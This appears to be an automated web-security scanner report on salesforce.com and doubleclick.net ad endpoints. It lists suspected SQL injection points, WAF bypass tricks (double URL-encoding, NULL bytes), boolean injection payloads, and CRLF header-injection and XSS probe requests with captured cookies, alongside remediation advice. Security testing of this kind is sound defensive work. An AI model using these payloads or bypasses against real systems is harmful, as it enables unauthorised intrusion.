SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the id cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:45 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 22 Apr 2011 15:51:45 GMT Expires: Fri, 22 Apr 2011 15:51:45 GMT Cache-Control: private Content-Length: 4618
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:46 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 22 Apr 2011 15:51:46 GMT Expires: Fri, 22 Apr 2011 15:51:46 GMT Cache-Control: private Content-Length: 4614
The hiddenlong parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hiddenlong parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The sbs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sbs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The CoreID6 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CoreID6 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The TXNSESSION cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TXNSESSION cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The cmRS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cmRS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The source cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Length: 517 Date: Fri, 22 Apr 2011 18:29:54 GMT Connection: close <html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1"><tr valign="top" bgcolor="#FBFFDF"align="Left"><td><STRONG>Error</STRONG></td></tr><tr valign="top" bgcolor="#FFFFFF"><td>This page can't be displayed due to a security violation. Contact support for additional information.<br>The incident ID is: 2759180419420659284.</td></tr></table></td></tr></table></body></html>
The 90043274_clogin cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 90043274_clogin cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The partner cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the partner cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the partner cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 783e8%0d%0ac06670d51f2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /783e8%0d%0ac06670d51f2/x1.aud/salesforce/customcloud/lp;sz=1x1;ord=1303485894655? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a868%0d%0ad0c23c48779 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7a868%0d%0ad0c23c48779/N3493.intergi.com/B5426713.10;sz=300x250;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785959%2F0%2F170%2FAdId%3D1631923%3BBnId%3D8%3Bitime%3D486158650%3Blink%3D;ord=486158650? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 1 is copied into the Location response header. The payload 60418%0d%0a34c9f29abd4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60418%0d%0a34c9f29abd4/N3493.intergi.com/B5426713.9;sz=728x90;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785960%2F0%2F225%2FAdId%3D1631923%3BBnId%3D7%3Bitime%3D486157331%3Blink%3D;ord=486157331? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 1 is copied into the Location response header. The payload 24a69%0d%0a95608d91e7f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 128d5%0d%0a371e27bda97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 85080%0d%0a1c362817312 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 4ab25%0d%0adf95d629563 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 444c6%0d%0ae6a8292f14b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 79784%0d%0aad9ab883b2f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5c7a0%0d%0ac1c87f28023 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 70979%0d%0a884ebdddc36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 38d1b%0d%0a18fb41cf4bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 39061%0d%0a54db89200bd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 42451%0d%0a9e7b66d82f4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 65653%0d%0af322941222e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 67945%0d%0ae9c1fd5ec9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 365d7%0d%0ae3dbdb6049c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5352f%0d%0a5f8bbb61a80 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 4a0e3%0d%0a90648814a15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 430c9%0d%0a639c3de1328 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 6ef0e%0d%0aecce4cabbe6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 4 is copied into the Location response header. The payload d4838%0d%0a4aa22e57a0d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/css/d4838%0d%0a4aa22e57a0d?date=04.22.20114 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the Location response header. The payload ebc7c%0d%0a3ed8cbad4a6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/css/ebc7c%0d%0a3ed8cbad4a6?date=04.22.20112 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the Location response header. The payload ade59%0d%0a2fe7fd351ad was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/ade59%0d%0a2fe7fd351ad?date=101221 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the Location response header. The payload 8d5c8%0d%0af90c3e609ab was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/opinionlab/8d5c8%0d%0af90c3e609ab?date=110127 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D
The URL has moved to <a href="/common/assets/js/opinionlab/8d5c8 f90c3e609ab/?date=110127">/common/assets/js/opinionlab/8d5c8 f90c3e609ab/?date=110127</a>
The value of REST URL parameter 4 is copied into the Location response header. The payload b2e21%0d%0adf42fdeb731 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/b2e21%0d%0adf42fdeb731?date=04.22.20112 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the Location response header. The payload 8db5a%0d%0a1d929d68ca9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/8db5a%0d%0a1d929d68ca9?date=04.22.20112 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the Location response header. The payload 1b145%0d%0a969e86ca9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/thirdparty/foresee/1b145%0d%0a969e86ca9d3 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B
The value of REST URL parameter 5 is copied into the Location response header. The payload a931d%0d%0afc491a3fb54 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/thirdparty/foresee/a931d%0d%0afc491a3fb54 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; fsr.a=1303485893905; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B
The value of REST URL parameter 5 is copied into the Location response header. The payload f1f38%0d%0a9190a9037c9 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/thirdparty/omniture/f1f38%0d%0a9190a9037c9?date=101221 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D
The URL has moved to <a href="/common/assets/thirdparty/omniture/f1f38 9190a9037c9/?date=101221">/common/assets/thirdparty/omniture/f1f38 9190a9037c9/?date=101221</a>
The value of REST URL parameter 5 is copied into the Location response header. The payload 1e04a%0d%0a284c4d986bb was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
